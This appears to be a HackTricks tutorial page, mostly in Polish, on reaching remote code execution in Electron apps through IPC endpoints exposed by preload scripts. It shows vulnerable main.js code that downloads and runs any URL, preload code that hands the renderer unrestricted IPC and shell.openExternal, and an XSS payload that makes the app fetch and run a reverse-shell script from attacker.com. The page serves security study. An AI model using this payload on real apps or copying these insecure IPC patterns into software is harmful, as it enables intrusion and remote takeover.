5.6 KiB
Electron contextIsolation RCE via IPC
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Jeśli skrypt preload udostępnia punkt końcowy IPC z pliku main.js, proces renderera będzie mógł uzyskać do niego dostęp, a jeśli jest podatny, może być możliwe RCE.
Większość tych przykładów pochodzi stąd https://www.youtube.com/watch?v=xILfQGkLXQo. Sprawdź wideo, aby uzyskać więcej informacji.
Example 0
Przykład z https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21 (masz pełny przykład, jak MS Teams wykorzystywał XSS do RCE w tych slajdach, to jest tylko bardzo podstawowy przykład):
Example 1
Sprawdź, jak main.js
nasłuchuje na getUpdate
i pobierze i wykona dowolny URL przekazany.
Sprawdź również, jak preload.js
udostępnia dowolne zdarzenie IPC z main.
// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
console.log('getUpdate: ' + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
});
mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
console.log('downloads path=' + app.getPath('downloads'))
console.log('mainWindow.download_url=' + mainWindow.download_url);
url_parts = mainWindow.download_url.split('/')
filename = url_parts[url_parts.length-1]
mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
console.log('downloadPath=' + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)
item.on('updated', (event, state) => {
if (state === 'interrupted') {
console.log('Download is interrupted but can be resumed')
}
else if (state === 'progressing') {
if (item.isPaused()) console.log('Download is paused')
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})
item.once('done', (event, state) => {
if (state === 'completed') {
console.log('Download successful, running update')
fs.chmodSync(mainWindow.downloadPath, 0755);
var child = require('child_process').execFile;
child(mainWindow.downloadPath, function(err, data) {
if (err) { console.error(err); return; }
console.log(data.toString());
});
}
else console.log(`Download failed: ${state}`)
})
})
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
Eksploit:
<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>
Przykład 2
Jeśli skrypt preload bezpośrednio udostępnia rendererowi sposób na wywołanie shell.openExternal
, możliwe jest uzyskanie RCE
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url);
};
Example 3
Jeśli skrypt preload udostępnia sposoby na pełną komunikację z głównym procesem, XSS będzie w stanie wysłać dowolne zdarzenie. Wpływ tego zależy od tego, co główny proces udostępnia w zakresie IPC.
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
};
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.